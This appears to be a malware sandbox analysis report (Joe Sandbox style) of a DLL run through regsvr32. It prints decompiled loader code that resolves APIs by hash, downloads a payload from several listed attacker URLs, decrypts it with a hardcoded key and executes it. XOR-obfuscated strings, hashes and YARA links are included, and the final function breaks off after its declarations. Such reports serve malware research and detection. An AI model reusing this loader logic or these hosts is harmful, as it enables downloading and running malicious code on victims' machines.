				intOrPtr _v416;
				int* _v420;
				int* _v424;
				intOrPtr _v428;
				int _v432;
				int _v436;
				int _v440;
				char* _v444;
				char* _v448;
				int _v452;
				int _v456;
				char _v468;
				char _v480;
				signed int _v544;
				signed short _v608;
				intOrPtr _t428;
				intOrPtr _t488;
				void* _t495;
				intOrPtr _t515;
				intOrPtr _t540;
				intOrPtr _t588;
				intOrPtr _t604;
				intOrPtr _t661;
				intOrPtr _t669;
				intOrPtr _t682;
				intOrPtr _t741;

				_push(0xffffffff);
				_push(0x6e46aeab);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t741;
				_v32 = 0;
				_v436 = 0;
				_v440 = 0;
				_v420 =  &_v480;
				_v148 = _v420;
				 *_v148 = 0;
				_v148[1] = 0;
				_v148[2] = 0;
				_v444 =  &_v480;
				_v8 = 0;
				_v424 =  &_v468;
				_v168 = _v424;
				 *_v168 = 0;
				_v168[1] = 0;
				_v168[2] = 0;
				_v448 =  &_v468;
				_v8 = 1;
				_t428 =  *0x6e474a88; // 0x6e474b70
				_v188 = E6E418300(_t428);
				_v40 = E6E41DF70(_v188,  &_v32);
				_v116 = _v452;
				_v428 =  *[fs:0x30];
				_v200 =  *((intOrPtr*)(_v428 + 0xc));
				_v204 =  *((intOrPtr*)(_v200 + 0xc));
				_v112 = _v204;
				do {
					_v56 =  *((intOrPtr*)(_v112 + 0x18));
					_v92 = _v56;
					_v208 = _v56 +  *((intOrPtr*)(_v56 + 0x3c));
					_t661 = _v208;
					_v400 =  *((intOrPtr*)(_t661 + 0x78));
					_v396 =  *((intOrPtr*)(_t661 + 0x7c));
					_v88 = _v56 + _v400;
					_v84 = _v396;
					if(_v88 == _v92) {
						_v192 = 0;
					} else {
						_v192 = 1;
					}
					_v20 = _v192;
					if((_v20 & 0x000000ff) != 0) {
						_v36 =  *((intOrPtr*)(_v88 + 0x18));
						while(1) {
							_v212 = _v36;
							_v36 = _v36 - 1;
							if(_v212 == 0) {
								goto L14;
							}
							_v216 = _v92 +  *((intOrPtr*)(_v92 +  *((intOrPtr*)(_v88 + 0x20)) + _v36 * 4));
							_v172 = _v216;
							_v108 = 0x811c9dc5;
							while(1) {
								_v21 =  *_v172;
								_v172 = _v172 + 1;
								_v17 = _v21;
								if(_v17 == 0) {
									break;
								}
								_v108 = (_v17 ^ _v108) * 0x1000193;
							}
							_v220 = _v108;
							if(_v220 != 0xbf0306f6) {
								continue;
							} else {
								_v228 = _v92 +  *((intOrPtr*)(_v88 + 0x1c));
								_v224 = _v92 +  *((intOrPtr*)(_v88 + 0x24));
								_v232 = _v92 +  *((intOrPtr*)(_v228 + ( *(_v224 + _v36 * 2) & 0x0000ffff) * 4));
								_v116 = _v232;
							}
							goto L16;
						}
					}
					goto L14;
					L16:
					_v244 =  &_v188;
					_v248 =  *_v244;
					_v116(_v248);
					E6E41A830(_v40, "FuHZu4rQgn3eqLZ6FB48Deybj49xEUCtDTAmF", 0x25, _v40, _v32);
					E6E41AA10( &_v608, _v40, 0x40);
					if((_v608 & 0x0000ffff) != 0x5a4d) {
						_v260 = _v40;
						L6E45A2B2(_v260);
						_t669 =  *0x6e474a84; // 0x6e474bb4
						_v176 = E6E418300(_t669);
						_v48 = E6E41DF70(_v176,  &_v32);
						_v136 = _v456;
						_v264 =  *[fs:0x30];
						_v268 =  *((intOrPtr*)(_v264 + 0xc));
						_v272 =  *((intOrPtr*)(_v268 + 0xc));
						_v132 = _v272;
						do {
							_v60 =  *((intOrPtr*)(_v132 + 0x18));
							_v104 = _v60;
							_v276 = _v60 +  *((intOrPtr*)(_v60 + 0x3c));
							_t588 = _v276;
							_v408 =  *((intOrPtr*)(_t588 + 0x78));
							_v404 =  *((intOrPtr*)(_t588 + 0x7c));
							_v100 = _v60 + _v408;
							_v96 = _v404;
							if(_v100 == _v104) {
								_v196 = 0;
							} else {
								_v196 = 1;
							}
							_v23 = _v196;
							if((_v23 & 0x000000ff) != 0) {
								_v44 =  *((intOrPtr*)(_v100 + 0x18));
								while(1) {
									_v280 = _v44;
									_v44 = _v44 - 1;
									if(_v280 == 0) {
										goto L34;
									}
									_v284 = _v104 +  *((intOrPtr*)(_v104 +  *((intOrPtr*)(_v100 + 0x20)) + _v44 * 4));
									_v124 = _v284;
									_v128 = 0x811c9dc5;
									while(1) {
										_v24 =  *_v124;
										_v124 = _v124 + 1;
										_v18 = _v24;
										if(_v18 == 0) {
											break;
										}
										_v128 = (_v18 ^ _v128) * 0x1000193;
									}
									_v288 = _v128;
									if(_v288 != 0xbf0306f6) {
										continue;
									} else {
										_v296 = _v104 +  *((intOrPtr*)(_v100 + 0x1c));
										_v292 = _v104 +  *((intOrPtr*)(_v100 + 0x24));
										_v300 = _v104 +  *((intOrPtr*)(_v296 + ( *(_v292 + _v44 * 2) & 0x0000ffff) * 4));
										_v136 = _v300;
									}
									goto L36;
								}
							}
							goto L34;
							L36:
							_v312 =  &_v176;
							_v316 =  *_v312;
							_v136(_v316);
							E6E41A830(_v48, "FuHZu4rQgn3eqLZ6FB48Deybj49xEUCtDTAmF", 0x25, _v48, _v32);
							E6E41AA10( &_v544, _v48, 0x40);
							if((_v544 & 0x0000ffff) != 0x5a4d) {
								_v328 = _v48;
								L6E45A2B2(_v328);
								_t682 =  *0x6e474a80; // 0x6e474bf8
								_v184 = E6E418300(_t682);
								_v68 = E6E41DF70(_v184,  &_v32);
								_v156 = _v432;
								_v332 =  *[fs:0x30];
								_v336 =  *((intOrPtr*)(_v332 + 0xc));
								_v340 =  *((intOrPtr*)(_v336 + 0xc));
								_v152 = _v340;
								do {
									_v64 =  *((intOrPtr*)(_v152 + 0x18));
									_v80 = _v64;
									_v344 = _v64 +  *((intOrPtr*)(_v64 + 0x3c));
									_t604 = _v344;
									_v416 =  *((intOrPtr*)(_t604 + 0x78));
									_v412 =  *((intOrPtr*)(_t604 + 0x7c));
									_v76 = _v64 + _v416;
									_v72 = _v412;
									if(_v76 == _v80) {
										_v180 = 0;
									} else {
										_v180 = 1;
									}
									_v26 = _v180;
									if((_v26 & 0x000000ff) != 0) {
										_v52 =  *((intOrPtr*)(_v76 + 0x18));
										while(1) {
											_v348 = _v52;
											_v52 = _v52 - 1;
											if(_v348 == 0) {
												goto L54;
											}
											_v352 = _v80 +  *((intOrPtr*)(_v80 +  *((intOrPtr*)(_v76 + 0x20)) + _v52 * 4));
											_v144 = _v352;
											_v164 = 0x811c9dc5;
											while(1) {
												_v27 =  *_v144;
												_v144 = _v144 + 1;
												_v19 = _v27;
												if(_v19 == 0) {
													break;
												}
												_v164 = (_v19 ^ _v164) * 0x1000193;
											}
											_v356 = _v164;
											if(_v356 != 0xbf0306f6) {
												continue;
											} else {
												_v364 = _v80 +  *((intOrPtr*)(_v76 + 0x1c));
												_v360 = _v80 +  *((intOrPtr*)(_v76 + 0x24));
												_v368 = _v80 +  *((intOrPtr*)(_v364 + ( *(_v360 + _v52 * 2) & 0x0000ffff) * 4));
												_v156 = _v368;
											}
											goto L56;
										}
									}
									goto L54;
									L56:
									_v380 =  &_v184;
									_v384 =  *_v380;
									_v156(_v384);
									E6E41A830(_v68, "FuHZu4rQgn3eqLZ6FB48Deybj49xEUCtDTAmF", 0x25, _v68, _v32);
									E6E41AA10( &_v544, _v68, 0x40);
									if((_v544 & 0x0000ffff) != 0x5a4d) {
										ExitProcess(0);
									}
									_v160 = E6E419700(_v68);
									_t488 =  *0x6e474a8c; // 0x6e474ad0
									 *0x6e474a94 = E6E4162E0(_v160, _t488);
									if( *0x6e474a94 == 0) {
										E6E416280(_v160);
										_v388 = E6E412080(L"Kernel32.dll", 0);
										_v388(0);
									}
									 *0x6e474a94();
									_v392 = _v68;
									L6E45A2B2(_v392);
									E6E416280(_v160);
									goto L61;
									L54:
									_v372 = _v152;
									_v376 =  *_v372;
									_v152 = _v376;
									_v28 = 1;
								} while ((_v28 & 0x000000ff) != 0);
								_v156 = 0;
								goto L56;
							} else {
								_v140 = E6E419700(_v48);
								_t515 =  *0x6e474a8c; // 0x6e474ad0
								 *0x6e474a94 = E6E4162E0(_v140, _t515);
								if( *0x6e474a94 == 0) {
									E6E416280(_v140);
									_v320 = E6E412080(L"Kernel32.dll", 0);
									_v320(0);
								}
								 *0x6e474a94();
								_v324 = _v48;
								L6E45A2B2(_v324);
								E6E416280(_v140);
							}
							goto L61;
							L34:
							_v304 = _v132;
							_v308 =  *_v304;
							_v132 = _v308;
							_v25 = 1;
						} while ((_v25 & 0x000000ff) != 0);
						_v136 = 0;
						goto L36;
					} else {
						_v120 = E6E419700(_v40);
						_t540 =  *0x6e474a8c; // 0x6e474ad0
						 *0x6e474a94 = E6E4162E0(_v120, _t540);
						if( *0x6e474a94 == 0) {
							E6E416280(_v120);
							_v252 = E6E412080(L"Kernel32.dll", 0);
							_v252(0);
						}
						 *0x6e474a94();
						_v256 = _v40;
						L6E45A2B2(_v256);
						E6E416280(_v120);
					}
					L61:
					_v8 = 0;
					E6E41A8F0( &_v468);
					_v8 = 0xffffffff;
					_t495 = E6E41A8F0( &_v480);
					 *[fs:0x0] = _v16;
					return _t495;
					L14:
					_v236 = _v112;
					_v240 =  *_v236;
					_v112 = _v240;
					_v22 = 1;
				} while ((_v22 & 0x000000ff) != 0);
				_v116 = 0;
				goto L16;
			}

0x6e419913
0x6e419915
0x6e419920
0x6e419921
0x6e41992e
0x6e419935
0x6e41993f
0x6e41994f
0x6e41995b
0x6e419967
0x6e419973
0x6e419980
0x6e41998d
0x6e419993
0x6e4199a0
0x6e4199ac
0x6e4199b8
0x6e4199c4
0x6e4199d1
0x6e4199de
0x6e4199e4
0x6e4199e8
0x6e4199f3
0x6e419a09
0x6e419a12
0x6e419a1c
0x6e419a2b
0x6e419a3a
0x6e419a46
0x6e419a49
0x6e419a4f
0x6e419a55
0x6e419a61
0x6e419a6f
0x6e419a7d
0x6e419a83
0x6e419a92
0x6e419a9b
0x6e419aa4
0x6e419ab2
0x6e419aa6
0x6e419aa6
0x6e419aa6
0x6e419ac2
0x6e419acb
0x6e419ad7
0x6e419ada
0x6e419add
0x6e419ae9
0x6e419af3
0x00000000
0x00000000
0x6e419b0b
0x6e419b17
0x6e419b1d
0x6e419b24
0x6e419b2c
0x6e419b38
0x6e419b41
0x6e419b4a
0x00000000
0x00000000
0x6e419b65
0x6e419b65
0x6e419b4f
0x6e419b74
0x00000000
0x6e419b76
0x6e419b7f
0x6e419b8e
0x6e419bad
0x6e419bb9
0x6e419bb9
0x00000000
0x6e419b74
0x6e419ada
0x00000000
0x6e419bfa
0x6e419c00
0x6e419c0e
0x6e419c1b
0x6e419c2d
0x6e419c3f
0x6e419c51
0x6e419cce
0x6e419cdb
0x6e419ce3
0x6e419cef
0x6e419d05
0x6e419d0e
0x6e419d1a
0x6e419d29
0x6e419d38
0x6e419d44
0x6e419d47
0x6e419d4d
0x6e419d53
0x6e419d5f
0x6e419d6d
0x6e419d7b
0x6e419d81
0x6e419d90
0x6e419d99
0x6e419da2
0x6e419db0
0x6e419da4
0x6e419da4
0x6e419da4
0x6e419dc0
0x6e419dc9
0x6e419dd5
0x6e419dd8
0x6e419ddb
0x6e419de7
0x6e419df1
0x00000000
0x00000000
0x6e419e09
0x6e419e15
0x6e419e18
0x6e419e1f
0x6e419e24
0x6e419e2d
0x6e419e33
0x6e419e3c
0x00000000
0x00000000
0x6e419e57
0x6e419e57
0x6e419e41
0x6e419e66
0x00000000
0x6e419e68
0x6e419e71
0x6e419e80
0x6e419e9f
0x6e419eab
0x6e419eab
0x00000000
0x6e419e66
0x6e419dd8
0x00000000
0x6e419ef2
0x6e419ef8
0x6e419f06
0x6e419f13
0x6e419f28
0x6e419f3a
0x6e419f4c
0x6e419fd9
0x6e419fe6
0x6e419fee
0x6e419ffa
0x6e41a010
0x6e41a019
0x6e41a025
0x6e41a034
0x6e41a043
0x6e41a04f
0x6e41a055
0x6e41a05e
0x6e41a064
0x6e41a070
0x6e41a07e
0x6e41a08c
0x6e41a092
0x6e41a0a1
0x6e41a0aa
0x6e41a0b3
0x6e41a0c1
0x6e41a0b5
0x6e41a0b5
0x6e41a0b5
0x6e41a0d1
0x6e41a0da
0x6e41a0e6
0x6e41a0e9
0x6e41a0ec
0x6e41a0f8
0x6e41a102
0x00000000
0x00000000
0x6e41a11a
0x6e41a126
0x6e41a12c
0x6e41a136
0x6e41a13e
0x6e41a14a
0x6e41a153
0x6e41a15c
0x00000000
0x00000000
0x6e41a17d
0x6e41a17d
0x6e41a164
0x6e41a18f
0x00000000
0x6e41a191
0x6e41a19a
0x6e41a1a9
0x6e41a1c8
0x6e41a1d4
0x6e41a1d4
0x00000000
0x6e41a18f
0x6e41a0e9
0x00000000
0x6e41a221
0x6e41a227
0x6e41a235
0x6e41a242
0x6e41a257
0x6e41a269
0x6e41a27b
0x6e41a27f
0x6e41a27f
0x6e41a28e
0x6e41a294
0x6e41a2a6
0x6e41a2b2
0x6e41a2bb
0x6e41a2cc
0x6e41a2d4
0x6e41a2d4
0x6e41a2da
0x6e41a2e3
0x6e41a2f0
0x6e41a2ff
0x00000000
0x6e41a1e1
0x6e41a1e7
0x6e41a1f5
0x6e41a201
0x6e41a207
0x6e41a20f
0x6e41a217
0x00000000
0x6e419f52
0x6e419f5b
0x6e419f61
0x6e419f73
0x6e419f7f
0x6e419f88
0x6e419f99
0x6e419fa1
0x6e419fa1
0x6e419fa7
0x6e419fb0
0x6e419fbd
0x6e419fcc
0x6e419fcc
0x00000000
0x6e419eb8
0x6e419ebb
0x6e419ec9
0x6e419ed5
0x6e419ed8
0x6e419ee0
0x6e419ee8
0x00000000
0x6e419c53
0x6e419c5c
0x6e419c5f
0x6e419c6e
0x6e419c7a
0x6e419c80
0x6e419c91
0x6e419c99
0x6e419c99
0x6e419c9f
0x6e419ca8
0x6e419cb5
0x6e419cc1
0x6e419cc1
0x6e41a304
0x6e41a304
0x6e41a30e
0x6e41a313
0x6e41a320
0x6e41a328
0x6e41a332
0x6e419bc3
0x6e419bc6
0x6e419bd4
0x6e419be0
0x6e419be3
0x6e419beb
0x6e419bf3
0x00000000

APIs

ExitProcess.KERNEL32 ref: 6E41A27F

Strings

FuHZu4rQgn3eqLZ6FB48Deybj49xEUCtDTAmF, xrefs: 6E419C28, 6E419F23, 6E41A252
https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx, xrefs: 6E4199ED
Kernel32.dll, xrefs: 6E419C87, 6E419F8F, 6E41A2C2
http://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx, xrefs: 6E419FF4
http://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/home.aspx, xrefs: 6E419CE9
DllRegisterServer, xrefs: 6E419C64, 6E419F66, 6E41A299

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer$FuHZu4rQgn3eqLZ6FB48Deybj49xEUCtDTAmF$Kernel32.dll$http://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/home.aspx$http://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx$https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx
API String ID: 621844428-2241756943
Opcode ID: fef988ab3ea35574df8e067767b5073c290387eb86de697d3ad3d50bf7252078
Instruction ID: 87f68105570ebcc9a486adf62beaf09471ada4a3a9f74a8f2867ea346d9aa183
Opcode Fuzzy Hash: fef988ab3ea35574df8e067767b5073c290387eb86de697d3ad3d50bf7252078
Instruction Fuzzy Hash: 3762B174E042688FDB64CFA8C890BEEBBB5BF49304F1081DAD549A7345D735AA85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E411300 Relevance: 12.8, Strings: 10, Instructions: 317
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E411300(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed char _v5;
				char _v6;
				signed char _v7;
				void* _v8;
				signed int _v9;
				char _v10;
				intOrPtr* _v16;
				signed int _v20;
				signed char* _v24;
				signed int _v28;
				char _v32;
				char _v35;
				void* _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				signed char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v65;
				short _v68;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v80;
				char _v84;
				intOrPtr* _v88;
				signed char _v92;
				short _v94;
				intOrPtr _v98;
				intOrPtr _v102;
				char _v105;
				signed char _v106;
				intOrPtr _v112;
				intOrPtr _v116;
				signed char* _v120;
				signed short* _v124;
				signed char* _v128;
				short* _v132;
				signed char* _v136;
				short* _v140;
				signed char* _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr* _v156;
				intOrPtr _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr* _v188;
				intOrPtr _v192;
				signed char* _v196;
				intOrPtr* _v200;
				intOrPtr* _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				char* _v216;
				signed char* _v220;
				char* _v224;
				char* _v228;
				char* _v232;
				char* _v236;
				char* _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				char _v284;
				char _v312;
				intOrPtr _t377;

				_v272 = 0xc;
				_v112 = 0x10;
				_v116 = 0x10;
				_v268 =  *[fs:0x30];
				_v276 =  *((intOrPtr*)(_v268 + _v272));
				_v88 =  *((intOrPtr*)(_v276 + _v112));
				_v280 =  *((intOrPtr*)(_v88 + _v116));
				_v16 = _v88;
				do {
					_v16 =  *_v16;
					if( *((intOrPtr*)(_v16 + 0x18)) == 0) {
						goto L24;
					} else {
						_v6 = 0;
						_v24 = E6E411260( &_v6,  &_v312);
						_v20 = 0;
						while(_v20 < 0xc) {
							_v120 =  &(_v24[2]);
							_v124 = _v120 + _v20 * 2;
							_v68 =  *_v124 & 0x0000ffff ^  *_v24;
							_v128 =  &(_v24[2]);
							_v132 = _v128 + _v20 * 2;
							 *_v132 = _v68;
							_v20 = _v20 + 1;
						}
						_v136 =  &(_v24[2]);
						_v140 = _v136 + (0xc << 1);
						 *_v140 = 0;
						_v144 =  &(_v24[2]);
						_v196 = _v144;
						_v84 = _v284;
						_v148 =  *[fs:0x30];
						_v152 =  *((intOrPtr*)(_v148 + 0xc));
						_v156 =  *((intOrPtr*)(_v152 + 0xc));
						_v80 = _v156;
						do {
							_v52 =  *((intOrPtr*)(_v80 + 0x18));
							_v64 = _v52;
							_v160 = _v52 +  *((intOrPtr*)(_v52 + 0x3c));
							_t377 = _v160;
							_v264 =  *((intOrPtr*)(_t377 + 0x78));
							_v260 =  *((intOrPtr*)(_t377 + 0x7c));
							_v60 = _v52 + _v264;
							_v56 = _v260;
							if(_v60 == _v64) {
								_v92 = 0;
							} else {
								_v92 = 1;
							}
							_v7 = _v92;
							if((_v7 & 0x000000ff) != 0) {
								_v28 =  *((intOrPtr*)(_v60 + 0x18));
								while(1) {
									_v164 = _v28;
									_v28 = _v28 - 1;
									if(_v164 == 0) {
										goto L20;
									}
									_v168 = _v64 +  *((intOrPtr*)(_v64 +  *((intOrPtr*)(_v60 + 0x20)) + _v28 * 4));
									_v72 = _v168;
									_v76 = 0x811c9dc5;
									while(1) {
										_v8 =  *_v72;
										_v72 = _v72 + 1;
										_v5 = _v8;
										if(_v5 == 0) {
											break;
										}
										_v76 = (_v5 ^ _v76) * 0x1000193;
									}
									_v172 = _v76;
									if(_v172 != 0xd3c5e4f6) {
										continue;
									} else {
										_v180 = _v64 +  *((intOrPtr*)(_v60 + 0x1c));
										_v176 = _v64 +  *((intOrPtr*)(_v60 + 0x24));
										_v184 = _v64 +  *((intOrPtr*)(_v180 + ( *(_v176 + _v28 * 2) & 0x0000ffff) * 4));
										_v84 = _v184;
									}
									goto L22;
								}
							}
							goto L20;
							L22:
							_v200 =  &_v196;
							_v208 =  *_v200;
							_v204 = _v16 + 0x30;
							_v212 =  *_v204;
							_push(_v208);
							_push(_v212);
							if(_v84() != 0) {
								goto L24;
							} else {
							}
							goto L25;
							L20:
							_v188 = _v80;
							_v192 =  *_v188;
							_v80 = _v192;
							_v9 = 1;
						} while ((_v9 & 0x000000ff) != 0);
						_v84 = 0;
						goto L22;
					}
					break;
					L24:
				} while (_v88 != _v16);
				L25:
				_v248 =  *((intOrPtr*)(_v16 + 0x18));
				_v65 = 0;
				_v48 = 0x5b;
				_v47 = 0x17;
				_v46 = 0x34;
				_v45 = 0x3a;
				_v44 = 0x3f;
				_v43 = 0x17;
				_v42 = 0x32;
				_v41 = 0x39;
				_v40 = 0x29;
				_v39 = 0x3a;
				_v38 = 0x29;
				_v37 = 0x22;
				_v36 = 0x1a;
				_v35 = 0;
				_v106 = _v48;
				_v102 = _v44;
				_v98 = _v40;
				_v94 = _v36;
				_v32 = 0;
				while(_v32 < 0xc) {
					_v216 =  &_v105;
					_v220 = _v216 + _v32;
					_v10 =  *_v220 ^ _v106;
					_v224 =  &_v105;
					_v228 = _v224 + _v32;
					 *_v228 = _v10;
					_v32 = _v32 + 1;
				}
				_v232 =  &_v105;
				_v236 = (0xc << 0) + _v232;
				 *_v236 = 0;
				_v240 =  &_v105;
				_v244 = E6E4585F0(_v240, 0xc, 0xa);
				 *0x6e4748d8 = E6E4117F0(_v248, _v244, 0xc, 0xa);
				_v252 = E6E4117D0(_v248, _a8);
				_v256 = E6E4117F0(_v252, _a4, _a12, _a16);
				return _v256;
			}

0x6e411309
0x6e411313
0x6e41131a
0x6e411327
0x6e41133b
0x6e41134c
0x6e411357
0x6e411360
0x6e411363
0x6e411371
0x6e41137b
0x00000000
0x6e411381
0x6e411383
0x6e411395
0x6e411398
0x6e4113aa
0x6e4113b6
0x6e4113c2
0x6e4113d3
0x6e4113dd
0x6e4113e9
0x6e4113f3
0x6e4113a7
0x6e4113a7
0x6e4113fe
0x6e411411
0x6e41141f
0x6e411428
0x6e411434
0x6e411440
0x6e41144a
0x6e411459
0x6e411468
0x6e411474
0x6e411477
0x6e41147d
0x6e411483
0x6e41148f
0x6e41149d
0x6e4114ab
0x6e4114b1
0x6e4114c0
0x6e4114c9
0x6e4114d2
0x6e4114dd
0x6e4114d4
0x6e4114d4
0x6e4114d4
0x6e4114e7
0x6e4114f0
0x6e4114fc
0x6e4114ff
0x6e411502
0x6e41150e
0x6e411518
0x00000000
0x00000000
0x6e411530
0x6e41153c
0x6e41153f
0x6e411546
0x6e41154b
0x6e411554
0x6e41155a
0x6e411563
0x00000000
0x00000000
0x6e41157e
0x6e41157e
0x6e411568
0x6e41158d
0x00000000
0x6e41158f
0x6e411598
0x6e4115a7
0x6e4115c6
0x6e4115d2
0x6e4115d2
0x00000000
0x6e41158d
0x6e4114ff
0x00000000
0x6e411613
0x6e411619
0x6e411627
0x6e411633
0x6e411641
0x6e41164d
0x6e411654
0x6e41165a
0x00000000
0x00000000
0x6e41165c
0x00000000
0x6e4115dc
0x6e4115df
0x6e4115ed
0x6e4115f9
0x6e4115fc
0x6e411604
0x6e41160c
0x00000000
0x6e41160c
0x00000000
0x6e41165e
0x6e411661
0x6e41166a
0x6e411670
0x6e411678
0x6e41167b
0x6e41167f
0x6e411683
0x6e411687
0x6e41168b
0x6e41168f
0x6e411693
0x6e411697
0x6e41169b
0x6e41169f
0x6e4116a3
0x6e4116a7
0x6e4116ab
0x6e4116af
0x6e4116b6
0x6e4116bc
0x6e4116c2
0x6e4116c9
0x6e4116cd
0x6e4116df
0x6e4116e8
0x6e4116f7
0x6e41170c
0x6e411712
0x6e411721
0x6e411730
0x6e4116dc
0x6e4116dc
0x6e411737
0x6e41174b
0x6e411757
0x6e41175d
0x6e411773
0x6e411790
0x6e41179e
0x6e4117bc
0x6e4117cb

Strings

2, xrefs: 6E411693
:, xrefs: 6E41169F
9, xrefs: 6E411697
", xrefs: 6E4116A7
[, xrefs: 6E41167B
4, xrefs: 6E411683
:, xrefs: 6E411687
?, xrefs: 6E41168B
), xrefs: 6E41169B
), xrefs: 6E4116A3

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID: "$)$)$2$4$9$:$:$?$[
API String ID: 0-1401052836
Opcode ID: 515aae838515674f423b75a6b67ea4c1722545318c2abbc37a90d1289594d6d9
Instruction ID: c2fee5e9cf55ac70a17990f6da77cf91fc69c4099a1bf5f17c3bb0e62def886b
Opcode Fuzzy Hash: 515aae838515674f423b75a6b67ea4c1722545318c2abbc37a90d1289594d6d9
Instruction Fuzzy Hash: A502E074E08259CFDB14CFA8C890BEDBBB2BF59304F14819AD859AB341D770AA85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E41AAC0 Relevance: 10.2, Strings: 6, Instructions: 2712
COMMONCrypto

Download Yara Rule

C-Code - Quality: 42%

			E6E41AAC0(void* __eflags) {
				signed char _v5;
				signed char _v6;
				signed char _v7;
				signed char _v8;
				signed char _v9;
				signed char _v10;
				signed char _v11;
				signed char _v12;
				signed char _v13;
				signed char _v14;
				signed char _v15;
				signed char _v16;
				signed char _v17;
				signed char _v18;
				char _v19;
				char _v20;
				char _v21;
				signed char _v22;
				void* _v23;
				signed int _v24;
				signed char _v25;
				void* _v26;
				signed int _v27;
				signed char _v28;
				void* _v29;
				signed int _v30;
				signed char _v31;
				void* _v32;
				signed int _v33;
				signed char _v34;
				void* _v35;
				signed int _v36;
				signed char _v37;
				void* _v38;
				signed int _v39;
				signed char _v40;
				void* _v41;
				signed int _v42;
				signed char _v43;
				void* _v44;
				signed int _v45;
				signed char _v46;
				void* _v47;
				signed int _v48;
				char _v49;
				char _v50;
				signed char _v51;
				void* _v52;
				signed int _v53;
				signed char _v54;
				void* _v55;
				signed int _v56;
				signed char _v57;
				void* _v58;
				signed int _v59;
				signed char _v60;
				void* _v61;
				signed int _v62;
				signed char _v63;
				void* _v64;
				signed int _v65;
				char _v66;
				char _v67;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed char* _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed char* _v128;
				signed int _v132;
				signed char* _v136;
				signed int _v140;
				signed char* _v144;
				signed int _v148;
				signed char* _v152;
				signed int _v156;
				signed char* _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				char _v425;
				short _v428;
				short _v430;
				intOrPtr* _v436;
				signed int _v440;
				intOrPtr* _v444;
				intOrPtr _v448;
				intOrPtr* _v452;
				signed int _v456;
				intOrPtr* _v460;
				intOrPtr _v464;
				intOrPtr* _v468;
				signed int _v472;
				intOrPtr* _v476;
				intOrPtr _v480;
				intOrPtr* _v484;
				signed int _v488;
				intOrPtr* _v492;
				intOrPtr _v496;
				intOrPtr* _v500;
				signed int _v504;
